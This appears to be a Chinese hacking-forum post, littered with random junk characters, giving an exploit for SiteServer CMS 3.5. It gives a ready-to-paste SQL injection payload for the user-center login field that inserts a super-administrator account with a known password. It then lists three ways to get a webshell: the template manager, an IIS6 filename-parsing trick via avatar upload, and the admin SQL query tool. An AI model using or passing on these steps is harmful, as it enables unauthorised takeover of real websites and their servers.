经测试秒杀最新的3.5版
& i/ M8 |1 c" ]' ~/ \
) r- ?3 n. u) Y E) d1 Cstieserver官网:www.siteserver.cn
5 E* w! S8 u0 m/ Y9 Q" q# l" ^& Q' w8 p: P
! u' F% k$ v1 I7 s
- h2 o% ]: Y; K. h5 e( H
EXP:: E) s) r+ C f) ]% w: Q) {, c" D
5 V3 E9 W, _) b7 }, z8 Y直接访问UserCenter/login.aspx
2 t0 C7 `$ W5 S4 O8 _0 i. l- D
; H2 E( P4 @1 m' N5 B
$ X/ \' ?/ ~; W; D2 x+ A8 G! c
+ n+ }, ^* r1 E9 M用户名处输入:/ E7 x2 T% Y5 e. B
# g; t z% u4 O( D6 [$ z123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--, W; x( s6 H* D, u3 L9 v8 l! N
3 y& x; ?9 ]7 r5 j! b3 \( K; i
1 E& Q. k V& R( r# S
1 {3 x ]) _( M& i. b8 `密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。9 a2 ~% i l% d3 _( j
" B, }. h6 n# h7 X 4 d3 i) S8 Y4 M( w
5 H* d: H3 V! t& j) X3 E
之后再访问后台SiteServer/login.aspx用插入的用户登陆" {& k1 H1 I0 b. o$ J" B- Z
% L# y1 i, ^+ L & X4 A( J |2 s/ j( j4 V) c' n
: f* O4 H( A$ S# L9 u8 Z
后台拿webshell的三种方法:' e8 R8 i* Q: _
, w& x2 `7 k0 w2 {1 U/ M/ {一、
3 w4 Z5 \9 r- ^) i5 }/ ^! J* Y: m- u& A" ^+ W
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
! x. y5 z1 i2 U6 w# t6 M$ X9 ?9 G/ U. Y, C6 S* b4 p9 U8 \$ ]1 h8 p
二、
3 k' y( f; y7 O3 I. x, {+ u
/ c+ Q2 ^/ a, D s% K' a成员权限-》添加用户-》用户名为:1.asp) s2 Y" {6 m' F1 ^% K: [7 W2 ?7 T
4 D5 J. q. c$ _1 @9 ]http://127.0.0.1/usercenter/
+ r- f% ]2 \' G& ?; g8 Z1 O: m: q% j( O+ m# k6 _9 Y8 ^6 f
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell3 p# k( V& G& u0 e9 p
$ g( J5 q9 |% N$ i) Q) J
(ps:后台添加用户时不会验证是否含有非法字符)$ t* x' c! A- |- @ q0 p* i
! x; k% W8 g3 w' o; b
三、
4 P2 K3 {3 m" ^3 t0 O8 d+ A+ _9 K( o) b1 E
系统工具-》实用工具-》机器参数查看3 R1 ]* P1 Y% A" o9 d# p/ o/ t5 [7 k
可以看到数据库类型、名称,WEB路径
: f: B$ B: O$ p" G" W$ F' ^ B' B8 k9 N6 x( m8 Z0 G# k# r
系统工具-》数据库工具-》SQL语句查询" W7 E- U) }2 K N/ ~! C
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。
7 W) s* V* f; m0 F; S" _
1 |5 R' j: b/ K, W |